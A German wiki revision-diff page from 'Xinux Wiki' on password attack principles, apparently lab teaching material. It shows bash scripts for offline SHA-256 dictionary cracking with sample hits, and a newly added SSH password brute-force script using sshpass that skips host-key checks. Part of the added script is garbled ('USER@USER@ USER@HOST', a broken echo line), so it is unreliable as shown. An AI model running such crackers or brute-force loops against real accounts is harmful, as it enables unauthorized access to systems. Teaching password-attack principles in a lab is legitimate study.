Passwort Angriffe Prinzip: Unterschied zwischen den Versionen

Aus Xinux Wiki
Zur Navigation springen Zur Suche springen
Zeile 37: Zeile 37:
 
*./pw-crack-offline-hash.sh  ba22bae4d286f37a07e800585b8acba09add0e2a370c6ea5b2b354f859d8c12d      bad-passwords.hash  
 
*./pw-crack-offline-hash.sh  ba22bae4d286f37a07e800585b8acba09add0e2a370c6ea5b2b354f859d8c12d      bad-passwords.hash  
 
  Treffer: lovely
 
  Treffer: lovely
 +
=ssh hack=
 +
<syntaxhighlight lang="bash">
 +
#!/bin/bash
 +
# einfaches SSH-PW-Brute wie hydra (Lab)
 +
HOST=$1
 +
USER=$2
 +
WORTLISTE=$3
 +
while read PW
 +
do
 +
if sshpass -p "$PW" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o PreferredAuthentications=password "USER@USER@ USER@HOST" "exit" 2>/dev/null
 +
then
 +
  echo "Treffer: USER:USER:
 +
  Treffer:PW"
 +
  exit
 +
fi
 +
done < "$WORTLISTE"
 +
 +
</syntaxhighlight>

Version vom 24. Juni 2026, 15:36 Uhr

Normale Hack

#!/bin/bash
HASH=$1
while read LINE
do
 PW_HS=$(echo $LINE | sha256sum | cut -f 1 -d " ")
 if [[ $PW_HS == $HASH ]]
   then
      echo "Treffer: $LINE"
    exit
 fi
done < $2
  • ./pw-crack-offline.sh cd293be6cea034bd45a0352775a219ef5dc7825ce55d1f7dae9762d80ce64411 bad-passwords
Treffer: whatever

Hash Tabelle

#!/bin/bash
HASH=$1
while read LINE
do
 PW_HS=$(echo $LINE | sha256sum | cut -f 1 -d " ")
 if [[ $PW_HS == $HASH ]]
   then
      echo "Treffer: $LINE"
    exit

 fi	   
done < $2
  • ./pw-crack-offline-hash.sh ba22bae4d286f37a07e800585b8acba09add0e2a370c6ea5b2b354f859d8c12d bad-passwords.hash
Treffer: lovely

ssh hack

#!/bin/bash
# einfaches SSH-PW-Brute wie hydra (Lab)
HOST=$1
USER=$2
WORTLISTE=$3
while read PW
do
if sshpass -p "$PW" ssh -o StrictHostKeyChecking=no -o ConnectTimeout=3 -o PreferredAuthentications=password "USER@USER@ USER@HOST" "exit" 2>/dev/null
 then
   echo "Treffer: USER:USER:
   Treffer:PW"
   exit
fi
done < "$WORTLISTE"